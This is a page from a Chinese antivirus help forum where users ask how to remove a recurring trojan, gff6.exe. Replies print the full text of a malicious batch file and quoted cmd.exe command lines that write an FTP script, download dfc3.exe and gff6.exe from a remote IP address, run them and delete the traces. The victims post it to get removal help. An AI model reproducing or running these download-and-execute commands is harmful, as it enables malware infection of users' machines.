瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 gff6.exe杀毒老是杀出这个木马,(尝试关闭445端口可能解决此问题)

12345   2  /  5  页   跳转

[求助] gff6.exe杀毒老是杀出这个木马,(尝试关闭445端口可能解决此问题)

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

毫无意义
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

C:\WINDOWS\system32存在木马的批处理:g45g.bat,会自动联网下载木马,晕死。。批处理的内容贴出来:echo open 218.25.54.221 2689 > ncc
echo 123>> ncc
echo 123>> ncc
echo bin >> ncc
echo get dfc3.exe >> ncc
echo get gff6.exe >> ncc
echo bye >> ncc
ftp -s:ncc
del ncc
start dfc3.exe
start gff6.exe
del /F /Q g45g.bat
gototop
 

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

我用卡卡助手的进程管理看到进程里有3个cmd.exe,命令行是cmd /c echo open 218.25.54.221 2689 > iecho 123>> iecho 123>> iecho bin >> iecho get gff6.exe >> iecho quit >> iftp -s:idel /F /Q igff6.exe
gototop
 

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

那就删除那些类似的批处理
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

删了g45g后面是不出现了,但是gff6.exe还是继续有啊
gototop
 

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

文件呢??

到今天为止,没一个愿意给那gff6.exe
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

dfc3.exe这个文件呢?
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复: gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

我从瑞星的备份区找到的,传上来给天月姐看看

附件附件:

下载次数:400
文件类型:application/octet-stream
文件大小:
上传时间:2010-6-4 22:41:18
描述:rar

gototop
 

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

我和楼主的情况也一样 删除了又出来 郁闷死我了  
请问 楼主 你是否玩DNF?
gototop
 

回复:gff6.exe杀毒老是杀出这个木马不知道如何处理~请教高手指点

我不玩DNF,我是前几天整理电脑,卸载flashwind这个垃圾加速器,一点卸载,瑞星就报毒,然后接着不能上网,借别人电脑查了一下,发现以前也有人出现过这种情况,于是下载winsockfix.exe修复工具修复,然后可以上网了,但是很不幸,就中这个毒了。
我也不知道到底是怎么中的
gototop
 
12345   2  /  5  页   跳转
页面顶部
Powered by Discuz!NT